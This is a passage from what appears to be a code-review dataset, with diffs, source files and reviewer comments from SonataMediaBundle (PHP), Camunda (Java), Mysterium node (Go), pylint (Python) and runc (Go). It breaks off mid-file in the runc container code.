$this->filesystem = $filesystem;
$this->cdn = $cdn;
$this->pathGenerator = $pathGenerator;
$this->thumbnail = $thumbnail;
}
/**
* {@inheritdoc}
*/
final public function transform(MediaInterface $media): void
{
if (null === $media->getBinaryContent()) {
return;
}
$this->doTransform($media);
$this->flushCdn($media);
}
/**
* @param MediaInterface $media
*/
public function flushCdn(MediaInterface $media)
{
if ($media->getId() && $this->requireThumbnails() && !$media->getCdnIsFlushable()) {
$flushPaths = [];
foreach ($this->getFormats() as $format => $settings) {
if (MediaProviderInterface::FORMAT_ADMIN === $format ||
substr($format, 0, \strlen((string) $media->getContext())) === $media->getContext()) {
$flushPaths[] = $this->getFilesystem()->get($this->generatePrivateUrl($media, $format), true)->getKey();
}
}
if (!empty($flushPaths)) {
$cdnFlushIdentifier = $this->getCdn()->flushPaths($flushPaths);
$media->setCdnFlushIdentifier($cdnFlushIdentifier);
$media->setCdnIsFlushable(true);
$media->setCdnStatus(CDNInterface::STATUS_TO_FLUSH);
}
}
}
/**
* {@inheritdoc}
*/
public function addFormat($name, $format)
{
$this->formats[$name] = $format;
}
/**
* {@inheritdoc}
*/
public function getFormat($name)
{
return isset($this->formats[$name]) ? $this->formats[$name] : false;
}
/**
* {@inheritdoc}
*/
public function requireThumbnails()
{
return null !== $this->getResizer();
}
/**
* {@inheritdoc}
*/
public function generateThumbnails(MediaInterface $media)
{
$this->thumbnail->generate($this, $media);
}
/**
* {@inheritdoc}
*/
public function removeThumbnails(MediaInterface $media, $formats = null)
{
$this->thumbnail->delete($this, $media, $formats);
}
/**
* {@inheritdoc}
*/
public function getFormatName(MediaInterface $media, $format)
{
if (MediaProviderInterface::FORMAT_ADMIN === $format) {
return MediaProviderInterface::FORMAT_ADMIN;
}
if (MediaProviderInterface::FORMAT_REFERENCE === $format) {
return MediaProviderInterface::FORMAT_REFERENCE;
}
$baseName = $media->getContext().'_';
if (substr($format, 0, \strlen($baseName)) === $baseName) {
return $format;
}
return $baseName.$format;
}
/**
* {@inheritdoc}
*/
public function getProviderMetadata()
{
return new Metadata($this->getName(), $this->getName().'.description', null, 'SonataMediaBundle', ['class' => 'fa fa-file']);
}
/**
* {@inheritdoc}
*/
public function preRemove(MediaInterface $media)
{
if ($this->requireThumbnails()) {
$this->thumbnail->delete($this, $media);
}
}
/**
* {@inheritdoc}
*/
public function postRemove(MediaInterface $media)
{
$path = $this->getReferenceImage($media);
if ($this->getFilesystem()->has($path)) {
$this->getFilesystem()->delete($path);
}
}
/**
* {@inheritdoc}
*/
public function generatePath(MediaInterface $media)
{
return $this->pathGenerator->generatePath($media);
}
/**
* {@inheritdoc}
*/
public function getFormats()
{
return $this->formats;
}
/**
* {@inheritdoc}
*/
public function setName($name)
{
$this->name = $name;
}
/**
* {@inheritdoc}
*/
public function getName()
{
return $this->name;
}
/**
* {@inheritdoc}
*/
public function setTemplates(array $templates)
{
$this->templates = $templates;
}
/**
* {@inheritdoc}
*/
public function getTemplates()
{
return $this->templates;
}
/**
* {@inheritdoc}
*/
public function getTemplate($name)
{
return isset($this->templates[$name]) ? $this->templates[$name] : null;
}
/**
* {@inheritdoc}
*/
public function getResizer()
{
return $this->resizer;
}
/**
* {@inheritdoc}
*/
public function getFilesystem()
{
return $this->filesystem;
}
/**
* {@inheritdoc}
*/
public function getCdn()
{
return $this->cdn;
}
/**
* {@inheritdoc}
*/
public function getCdnPath($relativePath, $isFlushable)
{
return $this->getCdn()->getPath($relativePath, $isFlushable);
}
/**
* {@inheritdoc}
*/
public function setResizer(ResizerInterface $resizer)
{
$this->resizer = $resizer;
}
/**
* {@inheritdoc}
*/
public function prePersist(MediaInterface $media)
{
$media->setCreatedAt(new \DateTime());
$media->setUpdatedAt(new \DateTime());
}
/**
* {@inheritdoc}
*/
public function preUpdate(MediaInterface $media)
{
$media->setUpdatedAt(new \DateTime());
}
/**
* {@inheritdoc}
*/
public function validate(ErrorElement $errorElement, MediaInterface $media)
{
}
/**
* @param MediaInterface $media
*/
abstract protected function doTransform(MediaInterface $media);
}
| 1 | 10,631 | Please make this private by default | sonata-project-SonataMediaBundle | php |
@@ -16,6 +16,12 @@
*/
package org.camunda.bpm.engine.impl.util.xml;
+import org.camunda.bpm.engine.impl.ProcessEngineLogger;
+import org.camunda.bpm.engine.impl.cfg.ProcessEngineConfigurationImpl;
+import org.camunda.bpm.engine.impl.context.Context;
+import org.camunda.bpm.engine.impl.util.EngineUtilLogger;
+
+import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
| 1 | /*
* Copyright Camunda Services GmbH and/or licensed to Camunda Services GmbH
* under one or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information regarding copyright
* ownership. Camunda licenses this file to you under the Apache License,
* Version 2.0; you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.camunda.bpm.engine.impl.util.xml;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
/**
* @author Tom Baeyens
*/
public class Parser {
protected static SAXParserFactory defaultSaxParserFactory = SAXParserFactory.newInstance();
public static final Parser INSTANCE = new Parser();
public Parse createParse() {
return new Parse(this);
}
protected SAXParser getSaxParser() throws Exception {
return getSaxParserFactory().newSAXParser();
}
protected SAXParserFactory getSaxParserFactory() {
return defaultSaxParserFactory;
}
}
| 1 | 12,656 | We can add `@Override` annotations to all of the implementations of this method. I think this is a best practice for us, but it would be nicer in any case. | camunda-camunda-bpm-platform | java |
@@ -7,5 +7,11 @@ type Resolver interface {
// Detector allows detecting location by current ip
type Detector interface {
- DetectCountry() (string, error)
+ DetectLocation() (Location, error)
+}
+
+// Cache allows caching location
+type Cache interface {
+ Get() (Location, error)
+ RefreshAndGet() (Location, error)
} | 1 | package location
// Resolver allows resolving location by ip
type Resolver interface {
ResolveCountry(ip string) (string, error)
}
// Detector allows detecting location by current ip
type Detector interface {
DetectCountry() (string, error)
}
| 1 | 10,990 | Most of uses of `RefreshAndGet` seems to be made only for `Refresh` part, result is ignored. We can simplify this method to assigning single responsibility to it - just `Refresh()`. | mysteriumnetwork-node | go |
@@ -137,7 +137,10 @@ class OptionsManagerMixIn:
def add_optik_option(self, provider, optikcontainer, opt, optdict):
args, optdict = self.optik_option(provider, opt, optdict)
- option = optikcontainer.add_option(*args, **optdict)
+ try:
+ option = optikcontainer.add_option(*args, **optdict)
+ except optparse.OptionConflictError:
+ return
self._all_options[opt] = provider
self._maxlevel = max(self._maxlevel, option.level or 0)
| 1 | # Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/main/LICENSE
import collections
import configparser
import contextlib
import copy
import functools
import optparse # pylint: disable=deprecated-module
import os
import sys
from pathlib import Path
from types import ModuleType
from typing import Dict, List, Optional, TextIO, Tuple, Union
import toml
from pylint import utils
from pylint.config.man_help_formatter import _ManHelpFormatter
from pylint.config.option import Option
from pylint.config.option_parser import OptionParser
def _expand_default(self, option):
"""Patch OptionParser.expand_default with custom behaviour
This will handle defaults to avoid overriding values in the
configuration file.
"""
if self.parser is None or not self.default_tag:
return option.help
optname = option._long_opts[0][2:]
try:
provider = self.parser.options_manager._all_options[optname]
except KeyError:
value = None
else:
optdict = provider.get_option_def(optname)
optname = provider.option_attrname(optname, optdict)
value = getattr(provider.config, optname, optdict)
value = utils._format_option_value(optdict, value)
if value is optparse.NO_DEFAULT or not value:
value = self.NO_DEFAULT_VALUE
return option.help.replace(self.default_tag, str(value))
@contextlib.contextmanager
def _patch_optparse():
# pylint: disable = redefined-variable-type
orig_default = optparse.HelpFormatter
try:
optparse.HelpFormatter.expand_default = _expand_default
yield
finally:
optparse.HelpFormatter.expand_default = orig_default
class OptionsManagerMixIn:
"""Handle configuration from both a configuration file and command line options"""
def __init__(self, usage, config_file=None):
self.config_file = config_file
self.reset_parsers(usage)
# list of registered options providers
self.options_providers = []
# dictionary associating option name to checker
self._all_options = collections.OrderedDict()
self._short_options = {}
self._nocallback_options = {}
self._mygroups = {}
# verbosity
self._maxlevel = 0
def reset_parsers(self, usage=""):
# configuration file parser
self.cfgfile_parser = configparser.ConfigParser(
inline_comment_prefixes=("#", ";")
)
# command line parser
self.cmdline_parser = OptionParser(Option, usage=usage)
self.cmdline_parser.options_manager = self
self._optik_option_attrs = set(self.cmdline_parser.option_class.ATTRS)
def register_options_provider(self, provider, own_group=True):
"""register an options provider"""
assert provider.priority <= 0, "provider's priority can't be >= 0"
for i, options_provider in enumerate(self.options_providers):
if provider.priority > options_provider.priority:
self.options_providers.insert(i, provider)
break
else:
self.options_providers.append(provider)
non_group_spec_options = [
option for option in provider.options if "group" not in option[1]
]
groups = getattr(provider, "option_groups", ())
if own_group and non_group_spec_options:
self.add_option_group(
provider.name.upper(),
provider.__doc__,
non_group_spec_options,
provider,
)
else:
for opt, optdict in non_group_spec_options:
self.add_optik_option(provider, self.cmdline_parser, opt, optdict)
for gname, gdoc in groups:
gname = gname.upper()
goptions = [
option
for option in provider.options
if option[1].get("group", "").upper() == gname
]
self.add_option_group(gname, gdoc, goptions, provider)
def add_option_group(self, group_name, _, options, provider):
# add option group to the command line parser
if group_name in self._mygroups:
group = self._mygroups[group_name]
else:
group = optparse.OptionGroup(
self.cmdline_parser, title=group_name.capitalize()
)
self.cmdline_parser.add_option_group(group)
group.level = provider.level
self._mygroups[group_name] = group
# add section to the config file
if (
group_name != "DEFAULT"
and group_name not in self.cfgfile_parser._sections
):
self.cfgfile_parser.add_section(group_name)
# add provider's specific options
for opt, optdict in options:
self.add_optik_option(provider, group, opt, optdict)
def add_optik_option(self, provider, optikcontainer, opt, optdict):
args, optdict = self.optik_option(provider, opt, optdict)
option = optikcontainer.add_option(*args, **optdict)
self._all_options[opt] = provider
self._maxlevel = max(self._maxlevel, option.level or 0)
def optik_option(self, provider, opt, optdict):
"""get our personal option definition and return a suitable form for
use with optik/optparse
"""
optdict = copy.copy(optdict)
if "action" in optdict:
self._nocallback_options[provider] = opt
else:
optdict["action"] = "callback"
optdict["callback"] = self.cb_set_provider_option
# default is handled here and *must not* be given to optik if you
# want the whole machinery to work
if "default" in optdict:
if (
"help" in optdict
and optdict.get("default") is not None
and optdict["action"] not in ("store_true", "store_false")
):
optdict["help"] += " [current: %default]"
del optdict["default"]
args = ["--" + str(opt)]
if "short" in optdict:
self._short_options[optdict["short"]] = opt
args.append("-" + optdict["short"])
del optdict["short"]
# cleanup option definition dict before giving it to optik
for key in list(optdict.keys()):
if key not in self._optik_option_attrs:
optdict.pop(key)
return args, optdict
def cb_set_provider_option(self, option, opt, value, parser):
"""optik callback for option setting"""
if opt.startswith("--"):
# remove -- on long option
opt = opt[2:]
else:
# short option, get its long equivalent
opt = self._short_options[opt[1:]]
# trick since we can't set action='store_true' on options
if value is None:
value = 1
self.global_set_option(opt, value)
def global_set_option(self, opt, value):
"""set option on the correct option provider"""
self._all_options[opt].set_option(opt, value)
def generate_config(
self, stream: Optional[TextIO] = None, skipsections: Tuple[str, ...] = ()
) -> None:
"""write a configuration file according to the current configuration
into the given stream or stdout
"""
options_by_section: Dict[str, List[Tuple]] = {}
sections = []
for provider in self.options_providers:
for section, options in provider.options_by_section():
if section is None:
section = provider.name
if section in skipsections:
continue
options = [
(n, d, v)
for (n, d, v) in options
if d.get("type") is not None and not d.get("deprecated")
]
if not options:
continue
if section not in sections:
sections.append(section)
alloptions = options_by_section.setdefault(section, [])
alloptions += options
stream = stream or sys.stdout
printed = False
for section in sections:
if printed:
print("\n", file=stream)
utils.format_section(
stream, section.upper(), sorted(options_by_section[section])
)
printed = True
def generate_manpage(
self, pkginfo: ModuleType, section: int = 1, stream: TextIO = sys.stdout
) -> None:
with _patch_optparse():
formatter = _ManHelpFormatter()
formatter.output_level = self._maxlevel
formatter.parser = self.cmdline_parser
print(
formatter.format_head(self.cmdline_parser, pkginfo, section),
file=stream,
)
print(self.cmdline_parser.format_option_help(formatter), file=stream)
print(formatter.format_tail(pkginfo), file=stream)
def load_provider_defaults(self):
"""initialize configuration using default values"""
for provider in self.options_providers:
provider.load_defaults()
def read_config_file(self, config_file=None, verbose=None):
"""Read the configuration file but do not load it (i.e. dispatching
values to each options provider)
"""
for help_level in range(1, self._maxlevel + 1):
opt = "-".join(["long"] * help_level) + "-help"
if opt in self._all_options:
break # already processed
help_function = functools.partial(self.helpfunc, level=help_level)
help_msg = f"{' '.join(['more'] * help_level)} verbose help."
optdict = {
"action": "callback",
"callback": help_function,
"help": help_msg,
}
provider = self.options_providers[0]
self.add_optik_option(provider, self.cmdline_parser, opt, optdict)
provider.options += ((opt, optdict),)
if config_file is None:
config_file = self.config_file
if config_file is not None:
config_file = os.path.expandvars(os.path.expanduser(config_file))
if not os.path.exists(config_file):
raise OSError(f"The config file {config_file} doesn't exist!")
use_config_file = config_file and os.path.exists(config_file)
if use_config_file:
self.set_current_module(config_file)
parser = self.cfgfile_parser
if config_file.endswith(".toml"):
self._parse_toml(config_file, parser)
else:
# Use this encoding in order to strip the BOM marker, if any.
with open(config_file, encoding="utf_8_sig") as fp:
parser.read_file(fp)
            # normalize sections' titles
for sect, values in list(parser._sections.items()):
if sect.startswith("pylint."):
sect = sect[len("pylint.") :]
if not sect.isupper() and values:
parser._sections[sect.upper()] = values
if not verbose:
return
if use_config_file:
msg = f"Using config file {os.path.abspath(config_file)}"
else:
msg = "No config file found, using default configuration"
print(msg, file=sys.stderr)
def _parse_toml(
self, config_file: Union[Path, str], parser: configparser.ConfigParser
) -> None:
"""Parse and handle errors of a toml configuration file."""
with open(config_file, encoding="utf-8") as fp:
content = toml.load(fp)
try:
sections_values = content["tool"]["pylint"]
except KeyError:
return
for section, values in sections_values.items():
section_name = section.upper()
# TOML has rich types, convert values to
# strings as ConfigParser expects.
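            # Illustrative conversions (option names are hypothetical, not read from a real file):
            #   jobs = 2                  -> "2"
            #   suggestion-mode = true    -> "yes"
            #   disable = ["C0114", "R"]  -> "C0114,R"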
if not isinstance(values, dict):
# This class is a mixin: add_message comes from the `PyLinter` class
self.add_message( # type: ignore
"bad-configuration-section", line=0, args=(section, values)
)
continue
for option, value in values.items():
if isinstance(value, bool):
values[option] = "yes" if value else "no"
elif isinstance(value, list):
values[option] = ",".join(value)
else:
values[option] = str(value)
for option, value in values.items():
try:
parser.set(section_name, option, value=value)
except configparser.NoSectionError:
parser.add_section(section_name)
parser.set(section_name, option, value=value)
def load_config_file(self):
"""Dispatch values previously read from a configuration file to each
        options provider."""
parser = self.cfgfile_parser
for section in parser.sections():
for option, value in parser.items(section):
try:
self.global_set_option(option, value)
except (KeyError, optparse.OptionError):
continue
def load_configuration(self, **kwargs):
"""override configuration according to given parameters"""
return self.load_configuration_from_config(kwargs)
def load_configuration_from_config(self, config):
for opt, opt_value in config.items():
opt = opt.replace("_", "-")
provider = self._all_options[opt]
provider.set_option(opt, opt_value)
def load_command_line_configuration(self, args=None) -> List[str]:
"""Override configuration according to command line parameters
return additional arguments
"""
with _patch_optparse():
args = sys.argv[1:] if args is None else list(args)
(options, args) = self.cmdline_parser.parse_args(args=args)
for provider in self._nocallback_options:
config = provider.config
for attr in config.__dict__.keys():
value = getattr(options, attr, None)
if value is None:
continue
setattr(config, attr, value)
return args
def add_help_section(self, title, description, level=0):
"""add a dummy option section for help purpose"""
group = optparse.OptionGroup(
self.cmdline_parser, title=title.capitalize(), description=description
)
group.level = level
self._maxlevel = max(self._maxlevel, level)
self.cmdline_parser.add_option_group(group)
def help(self, level=0):
"""return the usage string for available options"""
self.cmdline_parser.formatter.output_level = level
with _patch_optparse():
return self.cmdline_parser.format_help()
def helpfunc(self, option, opt, val, p, level): # pylint: disable=unused-argument
print(self.help(level))
sys.exit(0)
| 1 | 18,190 | @Pierre-Sassoulas Are we sure this doesn't create problems? Without it for some reason we get an error on `accept-no-param-docs` being a duplicate error. I couldn't figure out why it did this. This solves the issue and passes the tests, but I wonder if this creates other issues.. | PyCQA-pylint | py |
@@ -169,7 +169,17 @@ func (c *linuxContainer) OCIState() (*specs.State, error) {
}
func (c *linuxContainer) Processes() ([]int, error) {
- pids, err := c.cgroupManager.GetAllPids()
+ var pids []int
+ status, err := c.currentStatus()
+ if err != nil {
+ return pids, err
+ }
+	// For systemd cgroups, the unit's cgroup path is removed automatically once all of the container's processes have exited
+ if status == Stopped && !c.cgroupManager.Exists() {
+ return pids, nil
+ }
+
+ pids, err = c.cgroupManager.GetAllPids()
if err != nil {
return nil, newSystemErrorWithCause(err, "getting all container pids from cgroups")
} | 1 | // +build linux
package libcontainer
import (
"bytes"
"encoding/json"
"errors"
"fmt"
"io"
"io/ioutil"
"net"
"os"
"os/exec"
"path/filepath"
"reflect"
"strings"
"sync"
"time"
securejoin "github.com/cyphar/filepath-securejoin"
"github.com/opencontainers/runc/libcontainer/cgroups"
"github.com/opencontainers/runc/libcontainer/configs"
"github.com/opencontainers/runc/libcontainer/intelrdt"
"github.com/opencontainers/runc/libcontainer/system"
"github.com/opencontainers/runc/libcontainer/utils"
"github.com/opencontainers/runtime-spec/specs-go"
"github.com/checkpoint-restore/go-criu/v4"
criurpc "github.com/checkpoint-restore/go-criu/v4/rpc"
"github.com/golang/protobuf/proto"
"github.com/sirupsen/logrus"
"github.com/vishvananda/netlink/nl"
"golang.org/x/sys/unix"
)
const stdioFdCount = 3
type linuxContainer struct {
id string
root string
config *configs.Config
cgroupManager cgroups.Manager
intelRdtManager intelrdt.Manager
initPath string
initArgs []string
initProcess parentProcess
initProcessStartTime uint64
criuPath string
newuidmapPath string
newgidmapPath string
m sync.Mutex
criuVersion int
state containerState
created time.Time
}
// State represents a running container's state
type State struct {
BaseState
// Platform specific fields below here
// Specified if the container was started under the rootless mode.
// Set to true if BaseState.Config.RootlessEUID && BaseState.Config.RootlessCgroups
Rootless bool `json:"rootless"`
// Paths to all the container's cgroups, as returned by (*cgroups.Manager).GetPaths
//
// For cgroup v1, a key is cgroup subsystem name, and the value is the path
// to the cgroup for this subsystem.
//
// For cgroup v2 unified hierarchy, a key is "", and the value is the unified path.
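	//
	// Illustrative values (the paths are hypothetical, not taken from this file):
	//   cgroup v1: {"memory": "/sys/fs/cgroup/memory/mycontainer", "cpu": "/sys/fs/cgroup/cpu/mycontainer"}
	//   cgroup v2: {"": "/sys/fs/cgroup/mycontainer"}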
CgroupPaths map[string]string `json:"cgroup_paths"`
// NamespacePaths are filepaths to the container's namespaces. Key is the namespace type
// with the value as the path.
NamespacePaths map[configs.NamespaceType]string `json:"namespace_paths"`
// Container's standard descriptors (std{in,out,err}), needed for checkpoint and restore
ExternalDescriptors []string `json:"external_descriptors,omitempty"`
// Intel RDT "resource control" filesystem path
IntelRdtPath string `json:"intel_rdt_path"`
}
// Container is a libcontainer container object.
//
// Each container is thread-safe within the same process. Since a container can
// be destroyed by a separate process, any function may return that the container
// was not found.
type Container interface {
BaseContainer
// Methods below here are platform specific
// Checkpoint checkpoints the running container's state to disk using the criu(8) utility.
//
// errors:
// Systemerror - System error.
Checkpoint(criuOpts *CriuOpts) error
// Restore restores the checkpointed container to a running state using the criu(8) utility.
//
// errors:
// Systemerror - System error.
Restore(process *Process, criuOpts *CriuOpts) error
// If the Container state is RUNNING or CREATED, sets the Container state to PAUSING and pauses
// the execution of any user processes. Asynchronously, when the container finished being paused the
// state is changed to PAUSED.
// If the Container state is PAUSED, do nothing.
//
// errors:
// ContainerNotExists - Container no longer exists,
// ContainerNotRunning - Container not running or created,
// Systemerror - System error.
Pause() error
// If the Container state is PAUSED, resumes the execution of any user processes in the
// Container before setting the Container state to RUNNING.
// If the Container state is RUNNING, do nothing.
//
// errors:
// ContainerNotExists - Container no longer exists,
// ContainerNotPaused - Container is not paused,
// Systemerror - System error.
Resume() error
// NotifyOOM returns a read-only channel signaling when the container receives an OOM notification.
//
// errors:
// Systemerror - System error.
NotifyOOM() (<-chan struct{}, error)
// NotifyMemoryPressure returns a read-only channel signaling when the container reaches a given pressure level
//
// errors:
// Systemerror - System error.
NotifyMemoryPressure(level PressureLevel) (<-chan struct{}, error)
}
// ID returns the container's unique ID
func (c *linuxContainer) ID() string {
return c.id
}
// Config returns the container's configuration
func (c *linuxContainer) Config() configs.Config {
return *c.config
}
func (c *linuxContainer) Status() (Status, error) {
c.m.Lock()
defer c.m.Unlock()
return c.currentStatus()
}
func (c *linuxContainer) State() (*State, error) {
c.m.Lock()
defer c.m.Unlock()
return c.currentState()
}
func (c *linuxContainer) OCIState() (*specs.State, error) {
c.m.Lock()
defer c.m.Unlock()
return c.currentOCIState()
}
func (c *linuxContainer) Processes() ([]int, error) {
pids, err := c.cgroupManager.GetAllPids()
if err != nil {
return nil, newSystemErrorWithCause(err, "getting all container pids from cgroups")
}
return pids, nil
}
func (c *linuxContainer) Stats() (*Stats, error) {
var (
err error
stats = &Stats{}
)
if stats.CgroupStats, err = c.cgroupManager.GetStats(); err != nil {
return stats, newSystemErrorWithCause(err, "getting container stats from cgroups")
}
if c.intelRdtManager != nil {
if stats.IntelRdtStats, err = c.intelRdtManager.GetStats(); err != nil {
return stats, newSystemErrorWithCause(err, "getting container's Intel RDT stats")
}
}
for _, iface := range c.config.Networks {
switch iface.Type {
case "veth":
istats, err := getNetworkInterfaceStats(iface.HostInterfaceName)
if err != nil {
return stats, newSystemErrorWithCausef(err, "getting network stats for interface %q", iface.HostInterfaceName)
}
stats.Interfaces = append(stats.Interfaces, istats)
}
}
return stats, nil
}
func (c *linuxContainer) Set(config configs.Config) error {
c.m.Lock()
defer c.m.Unlock()
status, err := c.currentStatus()
if err != nil {
return err
}
if status == Stopped {
return newGenericError(errors.New("container not running"), ContainerNotRunning)
}
if err := c.cgroupManager.Set(&config); err != nil {
// Set configs back
if err2 := c.cgroupManager.Set(c.config); err2 != nil {
logrus.Warnf("Setting back cgroup configs failed due to error: %v, your state.json and actual configs might be inconsistent.", err2)
}
return err
}
if c.intelRdtManager != nil {
if err := c.intelRdtManager.Set(&config); err != nil {
// Set configs back
if err2 := c.intelRdtManager.Set(c.config); err2 != nil {
logrus.Warnf("Setting back intelrdt configs failed due to error: %v, your state.json and actual configs might be inconsistent.", err2)
}
return err
}
}
// After config setting succeed, update config and states
c.config = &config
_, err = c.updateState(nil)
return err
}
func (c *linuxContainer) Start(process *Process) error {
c.m.Lock()
defer c.m.Unlock()
if process.Init {
if err := c.createExecFifo(); err != nil {
return err
}
}
if err := c.start(process); err != nil {
if process.Init {
c.deleteExecFifo()
}
return err
}
return nil
}
func (c *linuxContainer) Run(process *Process) error {
if err := c.Start(process); err != nil {
return err
}
if process.Init {
return c.exec()
}
return nil
}
func (c *linuxContainer) Exec() error {
c.m.Lock()
defer c.m.Unlock()
return c.exec()
}
func (c *linuxContainer) exec() error {
path := filepath.Join(c.root, execFifoFilename)
pid := c.initProcess.pid()
blockingFifoOpenCh := awaitFifoOpen(path)
for {
select {
case result := <-blockingFifoOpenCh:
return handleFifoResult(result)
case <-time.After(time.Millisecond * 100):
stat, err := system.Stat(pid)
if err != nil || stat.State == system.Zombie {
// could be because process started, ran, and completed between our 100ms timeout and our system.Stat() check.
// see if the fifo exists and has data (with a non-blocking open, which will succeed if the writing process is complete).
if err := handleFifoResult(fifoOpen(path, false)); err != nil {
return errors.New("container process is already dead")
}
return nil
}
}
}
}
func readFromExecFifo(execFifo io.Reader) error {
data, err := ioutil.ReadAll(execFifo)
if err != nil {
return err
}
if len(data) <= 0 {
return errors.New("cannot start an already running container")
}
return nil
}
func awaitFifoOpen(path string) <-chan openResult {
fifoOpened := make(chan openResult)
go func() {
result := fifoOpen(path, true)
fifoOpened <- result
}()
return fifoOpened
}
func fifoOpen(path string, block bool) openResult {
flags := os.O_RDONLY
if !block {
flags |= unix.O_NONBLOCK
}
f, err := os.OpenFile(path, flags, 0)
if err != nil {
return openResult{err: newSystemErrorWithCause(err, "open exec fifo for reading")}
}
return openResult{file: f}
}
func handleFifoResult(result openResult) error {
if result.err != nil {
return result.err
}
f := result.file
defer f.Close()
if err := readFromExecFifo(f); err != nil {
return err
}
return os.Remove(f.Name())
}
type openResult struct {
file *os.File
err error
}
func (c *linuxContainer) start(process *Process) error {
parent, err := c.newParentProcess(process)
if err != nil {
return newSystemErrorWithCause(err, "creating new parent process")
}
parent.forwardChildLogs()
if err := parent.start(); err != nil {
// terminate the process to ensure that it properly is reaped.
if err := ignoreTerminateErrors(parent.terminate()); err != nil {
logrus.Warn(err)
}
return newSystemErrorWithCause(err, "starting container process")
}
// generate a timestamp indicating when the container was started
c.created = time.Now().UTC()
if process.Init {
c.state = &createdState{
c: c,
}
state, err := c.updateState(parent)
if err != nil {
return err
}
c.initProcessStartTime = state.InitProcessStartTime
if c.config.Hooks != nil {
s, err := c.currentOCIState()
if err != nil {
return err
}
for i, hook := range c.config.Hooks.Poststart {
if err := hook.Run(s); err != nil {
if err := ignoreTerminateErrors(parent.terminate()); err != nil {
logrus.Warn(err)
}
return newSystemErrorWithCausef(err, "running poststart hook %d", i)
}
}
}
}
return nil
}
func (c *linuxContainer) Signal(s os.Signal, all bool) error {
c.m.Lock()
defer c.m.Unlock()
if all {
return signalAllProcesses(c.cgroupManager, s)
}
status, err := c.currentStatus()
if err != nil {
return err
}
// to avoid a PID reuse attack
if status == Running || status == Created || status == Paused {
if err := c.initProcess.signal(s); err != nil {
return newSystemErrorWithCause(err, "signaling init process")
}
return nil
}
return newGenericError(errors.New("container not running"), ContainerNotRunning)
}
func (c *linuxContainer) createExecFifo() error {
rootuid, err := c.Config().HostRootUID()
if err != nil {
return err
}
rootgid, err := c.Config().HostRootGID()
if err != nil {
return err
}
fifoName := filepath.Join(c.root, execFifoFilename)
if _, err := os.Stat(fifoName); err == nil {
return fmt.Errorf("exec fifo %s already exists", fifoName)
}
oldMask := unix.Umask(0000)
if err := unix.Mkfifo(fifoName, 0622); err != nil {
unix.Umask(oldMask)
return err
}
unix.Umask(oldMask)
return os.Chown(fifoName, rootuid, rootgid)
}
func (c *linuxContainer) deleteExecFifo() {
fifoName := filepath.Join(c.root, execFifoFilename)
os.Remove(fifoName)
}
// includeExecFifo opens the container's execfifo as a pathfd, so that the
// container cannot access the statedir (and the FIFO itself remains
// un-opened). It then adds the FifoFd to the given exec.Cmd as an inherited
// fd, with _LIBCONTAINER_FIFOFD set to its fd number.
func (c *linuxContainer) includeExecFifo(cmd *exec.Cmd) error {
fifoName := filepath.Join(c.root, execFifoFilename)
fifoFd, err := unix.Open(fifoName, unix.O_PATH|unix.O_CLOEXEC, 0)
if err != nil {
return err
}
cmd.ExtraFiles = append(cmd.ExtraFiles, os.NewFile(uintptr(fifoFd), fifoName))
cmd.Env = append(cmd.Env,
fmt.Sprintf("_LIBCONTAINER_FIFOFD=%d", stdioFdCount+len(cmd.ExtraFiles)-1))
return nil
}
func (c *linuxContainer) newParentProcess(p *Process) (parentProcess, error) {
parentInitPipe, childInitPipe, err := utils.NewSockPair("init")
if err != nil {
return nil, newSystemErrorWithCause(err, "creating new init pipe")
}
messageSockPair := filePair{parentInitPipe, childInitPipe}
parentLogPipe, childLogPipe, err := os.Pipe()
if err != nil {
return nil, fmt.Errorf("Unable to create the log pipe: %s", err)
}
logFilePair := filePair{parentLogPipe, childLogPipe}
cmd := c.commandTemplate(p, childInitPipe, childLogPipe)
if !p.Init {
return c.newSetnsProcess(p, cmd, messageSockPair, logFilePair)
}
// We only set up fifoFd if we're not doing a `runc exec`. The historic
// reason for this is that previously we would pass a dirfd that allowed
// for container rootfs escape (and not doing it in `runc exec` avoided
// that problem), but we no longer do that. However, there's no need to do
// this for `runc exec` so we just keep it this way to be safe.
if err := c.includeExecFifo(cmd); err != nil {
return nil, newSystemErrorWithCause(err, "including execfifo in cmd.Exec setup")
}
return c.newInitProcess(p, cmd, messageSockPair, logFilePair)
}
func (c *linuxContainer) commandTemplate(p *Process, childInitPipe *os.File, childLogPipe *os.File) *exec.Cmd {
cmd := exec.Command(c.initPath, c.initArgs[1:]...)
cmd.Args[0] = c.initArgs[0]
cmd.Stdin = p.Stdin
cmd.Stdout = p.Stdout
cmd.Stderr = p.Stderr
cmd.Dir = c.config.Rootfs
if cmd.SysProcAttr == nil {
cmd.SysProcAttr = &unix.SysProcAttr{}
}
cmd.Env = append(cmd.Env, fmt.Sprintf("GOMAXPROCS=%s", os.Getenv("GOMAXPROCS")))
cmd.ExtraFiles = append(cmd.ExtraFiles, p.ExtraFiles...)
if p.ConsoleSocket != nil {
cmd.ExtraFiles = append(cmd.ExtraFiles, p.ConsoleSocket)
cmd.Env = append(cmd.Env,
fmt.Sprintf("_LIBCONTAINER_CONSOLE=%d", stdioFdCount+len(cmd.ExtraFiles)-1),
)
}
cmd.ExtraFiles = append(cmd.ExtraFiles, childInitPipe)
cmd.Env = append(cmd.Env,
fmt.Sprintf("_LIBCONTAINER_INITPIPE=%d", stdioFdCount+len(cmd.ExtraFiles)-1),
fmt.Sprintf("_LIBCONTAINER_STATEDIR=%s", c.root),
)
cmd.ExtraFiles = append(cmd.ExtraFiles, childLogPipe)
cmd.Env = append(cmd.Env,
fmt.Sprintf("_LIBCONTAINER_LOGPIPE=%d", stdioFdCount+len(cmd.ExtraFiles)-1),
fmt.Sprintf("_LIBCONTAINER_LOGLEVEL=%s", p.LogLevel),
)
	// NOTE: when running a container with no PID namespace and the parent process spawning the container is
	// PID 1, the kernel for some reason delivers the pdeathsig to the container's init process
	// even though the parent is still running.
if c.config.ParentDeathSignal > 0 {
